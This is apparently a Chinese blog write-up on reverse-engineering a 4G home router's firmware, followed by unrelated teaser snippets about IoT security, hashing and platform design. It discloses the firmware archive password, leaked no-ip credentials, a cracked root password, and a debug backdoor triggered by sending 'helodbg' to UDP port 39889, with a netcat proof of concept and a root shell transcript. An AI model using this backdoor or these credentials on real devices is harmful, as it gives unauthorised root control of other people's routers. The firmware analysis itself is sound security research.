ps:本文所用到的程式見 –
得到韌體後,若直接開啟,會發現該韌體被加了密,無法直接解壓縮,這是廠商對該韌體做了保護,防止大家逆向分析他的韌體。
通過frackzip工具可以破解該zip的密碼,時間要挺久的,我直接告訴你吧,密碼是beut9z。
解壓後發現資料夾中有多個.yaffs2字尾的檔案,這些都是韌體的檔案。
yaffs2裡有幾個看上去是recovery的映象,核心的應該是2k-mdm-image-mdm9625.yaffs2 ,我們下面就來提取該檔案,我首先用binwalk來提取它,但提取出來的檔案亂七八糟,不知道什麼原因,後來看網上推薦直接用yaffs的原生工具unyaffs提取,就可以了,檔案系統清晰明了。
接下來我們查詢該路徑下的所有.conf檔案,.conf檔案多是配置檔案,有可能從中可以發現敏感的資訊。
其中的inadyn-mt.conf檔案引起了我們注意,這是no-ip應用的配置檔案,no-ip就是乙個相當於花生殼的東西,可以申請動態網域名稱。我們從中可以發現洩露的no-ip的登陸賬號及密碼。
除了上述洩露的no-ip賬號密碼,我們還從shadow檔案中找到了root賬號的密碼,通過爆破可以得到root的密碼為1234。
其實並不止有.conf檔案會洩露資訊,還有很多其他字尾的敏感檔案會洩露資訊,我們接下來使用firmwalker工具來自動化遍歷該韌體系統中的所有可疑檔案。
命令如下,firmwalker會將結果儲存到firmwalker.txt。
看了下該工具的原始碼,沒啥亮點,就是遍歷各種字尾的檔案。
字尾都在data資料夾中的各個配置檔案中。
通過ida進行反編譯,在main函式中發現了乙個管理員當時為了方便除錯留下的後門,只要連線該韌體的39889埠並傳送helodbg的字串,就可以進行遠端執行命令。
poc如下:
user@kali:~$ echo -ne "helodbg" | nc -u 192.168.1.1 39889
hello
^c user@kali:~$ telnet 192.168.1.1
trying 192.168.1.1...
connected to 192.168.1.1. escape character is '^]'.
openembedded linux homerouter.cpe
msm 20141210 homerouter.cpe
/ #
id uid=0(root) gid=0(root)
/ #
exit
connection closed by foreign host.
user@kali:~$
除了以上這些,該韌體還存在多個漏洞,詳細的報告請看這~
《物聯網安全基礎》筆記二
演算法的核心技術是設計無碰撞的壓縮函式f,由於f是由若干輪處理過程組成的,所以對f的攻擊需要對各輪之間的位模式的分析來進行,常需要先找出f的碰撞 sha目前有5種演算法,sha1,sha224,sha256,sha284,sha512,後四者有時並稱為sha2 cbc mac是一種經典的構造mac的...
為什麼網路安全對物聯網(IoT)很重要
物聯網和連線裝置的持續增長 gartner 到2020年結束,全球將使用204億個連線物 導致資料呈指數級增長 有望使家電更智慧型,過程更高效,生活更輕鬆。儘管這種大規模生成和收集資料肯定有很大的好處,但輕鬆訪問資料也帶來了更多的漏洞 不安全的iot裝置給個人和公司資訊帶來了嚴重的風險。出於多種原因...
IoT 一 物聯網平台架構設計分析
裝置管理 裝置管理定義裝置相關資訊,每個裝置必須定義其裝置型別,裝置型別有使用者屬性,裝置在完成銷售,並被使用者啟用後裝置就屬於裝置使用者了,這時候裝置使用者對裝置有完全的控制權,可以控制裝置的哪些資料可以被製造商檢視,可以被哪些使用者檢視等許可權 使用者管理 使用者是基於乙個組織下的人員構成,每個...